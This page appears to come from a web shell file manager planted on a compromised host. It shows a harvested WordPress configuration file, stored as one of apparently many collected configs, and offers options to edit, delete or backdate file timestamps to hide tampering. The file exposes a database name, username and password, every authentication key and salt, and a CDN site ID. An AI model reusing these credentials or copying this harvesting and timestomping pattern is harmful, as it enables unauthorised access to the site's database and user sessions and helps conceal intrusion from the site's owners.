文件操作 - 46-WordPress-public_html.txt
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/rokpawnew/public_html/configLZH/46-WordPress-public_html.txt
编辑文件内容
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'redlightinflamationdb' ); /** Database username */ define( 'DB_USER', 'redlightinflamationdbuser' ); /** Database password */ define( 'DB_PASSWORD', 'KB8ABKWyAE6MGlVCMe' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'K8JR__Dxj6|^/u&Gx*JTE*In`=YQVU{*+)XUR?=u9yT]49Q~i-JcbB+ U.ds+g~D' ); define( 'SECURE_AUTH_KEY', '<;oV<1zJ0YPu]TmR/]IfH2-ua^_$G8j{1KDEA9~d/{bc5f[|syNs][+$8YRo}FyY' ); define( 'LOGGED_IN_KEY', 'S^jp352)T[nlM* v{=@>JO>@y0heKq&J<w)ni9.-D5@F;1f*,t0QV.w`: #MezF1' ); define( 'NONCE_KEY', '5uUWvcwVlykPpZ:jRY7G(,0XTF9XR3s.GfRV!W+CVsx0(.oQC@ict=^JBz0ir5=:' ); define( 'AUTH_SALT', 'R$<<Iqe8(ycoQL.d_l22g.u5N ?=e)(8^UcwVE:w;=j>{(;*8S~i@zXW;&_Q*4CO' ); define( 'SECURE_AUTH_SALT', 'oeI,5SWTIdizVxKDY/||E9EG%&IuLJ3bLNU3O>?--@%8N^PUrGgsY?i9^qkHW=?3' ); define( 'LOGGED_IN_SALT', '!BIzL|XR]CEKh~Yme$6als99r c@=%e&u]8p.*~Qv`L|.~+4#.(v@d-np9M:gE&Q' ); define( 'NONCE_SALT', 'BpV.Kf9*CFZ{<)S_d, 0#z:!y! XBC3dO<jxjTD2tVsLQP%mTl4Z9HKOR7}Wc--d' ); define( 'WP_CACHE_KEY_SALT', 'l|+Y */&KA3C{^S-xvS@ o/J4rtb7!&Sd{>:%_6BhYWxo~W|k:R[277]/Qo+l>;+' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ define( 'FS_METHOD', 'direct' ); define( 'WP_MEMORY_LIMIT', '256M' ); define( 'CDN_SITE_ID', '7m12JPuEaeY7L86My7OLmSvRJ' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
修改文件时间
将文件时间修改为当前时间的前一年
删除文件